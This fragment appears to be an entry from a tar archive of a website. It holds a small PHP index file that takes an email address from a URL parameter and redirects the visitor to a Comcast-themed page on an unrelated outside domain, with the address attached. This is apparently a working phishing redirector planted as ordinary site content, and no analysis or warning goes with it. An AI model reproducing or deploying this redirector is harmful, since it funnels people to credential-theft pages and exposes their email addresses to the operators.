dvadf
index.php 0000644 00000000270 15144330143 0006361 0 ustar 00 <?php
$url = "https://workhub-portals.com/comcast/";
$cl = explode( '/', $_GET['cl'] );
$random = $cl[0];
$email = $cl[1];
header("Location: $url?email=$email");
?>